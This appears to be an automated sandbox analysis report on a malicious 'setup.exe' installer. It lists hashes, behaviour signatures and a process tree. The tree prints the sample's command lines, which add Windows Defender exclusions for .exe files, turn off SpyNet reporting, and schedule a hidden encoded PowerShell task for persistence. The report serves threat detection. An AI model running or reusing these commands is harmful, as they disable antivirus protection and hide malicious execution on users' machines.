Overview

overview

10

Static

static

3

setup.exe

windows7-x64

10

setup.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    25s
  • max time network
    21s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2023 05:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup.exe

  • Size

    7.2MB

  • MD5

    e1f41a1d78614945b44e648155a13778

  • SHA1

    d67ab2ac2f31a7fc778b0b5117715e6f0638d90f

  • SHA256

    9a55005ab12529cde78752fd23476d0440d31247449ec86999b554f08f9b8469

  • SHA512

    f70bf4a109ecbb6131d696fd3087c198ed5a4029ba47be0a0fcc2ad0b6bff080a054c8702e3fcf178f901605a23a4e570f8cba73a79234b54c723fc68376bfca

  • SSDEEP

    196608:91OEbEp2HgtmQhl64gtK8GllcpCiXamcJPd/I:3OPp2HgQ88bKmchd/I

Score
7/10

Malware Config

Signatures

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Users\Admin\AppData\Local\Temp\7zS8B0A.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4804
      • C:\Users\Admin\AppData\Local\Temp\7zS8C81.tmp\Install.exe
        .\Install.exe /GKFdidhT "385118" /S
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1084
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2716
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1944
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:2980
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:4992
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1936
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3636
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:4092
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:2388
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gsyXpPNPd" /SC once /ST 08:21:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:1080
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gsyXpPNPd"
                  4⤵
                    PID:4152
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              1⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5032

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\7zS8B0A.tmp\Install.exe
              Filesize

              6.1MB

              MD5

              a14caa716ad3b5477fbec3dbe26f7cc9

              SHA1

              1f8b4128fdd458c8ec85430d76f340b5e9e26482

              SHA256

              e868014e9d327369e9c0e353a95b9dd75871e5f1365fe8ef3d022bcc8ff43af6

              SHA512

              30c1aea5892c316e4a7d11e79d8894fe851e9d5e83485da62a22ed2f99e18c952a9576cfc2d250011f4089d91b583a9045883bf5204b1e48fc0d6f7562b25837

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\7zS8B0A.tmp\Install.exe
              Filesize

              6.1MB

              MD5

              a14caa716ad3b5477fbec3dbe26f7cc9

              SHA1

              1f8b4128fdd458c8ec85430d76f340b5e9e26482

              SHA256

              e868014e9d327369e9c0e353a95b9dd75871e5f1365fe8ef3d022bcc8ff43af6

              SHA512

              30c1aea5892c316e4a7d11e79d8894fe851e9d5e83485da62a22ed2f99e18c952a9576cfc2d250011f4089d91b583a9045883bf5204b1e48fc0d6f7562b25837

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\7zS8C81.tmp\Install.exe
              Filesize

              6.9MB

              MD5

              425cca2e32d9e1fb26c90c9d32632aa6

              SHA1

              21753ce79cbc01184a24e3a2f2cac65da4ab6bc4

              SHA256

              694196c368ad76dde9fc94d4bf57df4697c05006a59591112dba5638ac1a0ec4

              SHA512

              2b08593fd7e195bdef4a23033e1ba86c5480f9ec6acc34a5b8fa9988e195a4e466c20625084a34d9a070362943d3e31239494761f9285996be5f42466f6a7384

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m5hcm4g5.jgb.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • memory/1084-11-0x0000000000470000-0x0000000000B58000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/1084-12-0x0000000010000000-0x0000000010587000-memory.dmp

              Filesize

              5.5MB

              Download

            • memory/1084-16-0x0000000000470000-0x0000000000B58000-memory.dmp

              Filesize

              6.9MB

              Download

            • memory/5032-17-0x00007FFCA2410000-0x00007FFCA2ED1000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/5032-18-0x000001A6D3C80000-0x000001A6D3C90000-memory.dmp

              Filesize

              64KB

              Download

            • memory/5032-19-0x000001A6D3C80000-0x000001A6D3C90000-memory.dmp

              Filesize

              64KB

              Download

            • memory/5032-29-0x000001A6D4130000-0x000001A6D4152000-memory.dmp

              Filesize

              136KB

              Download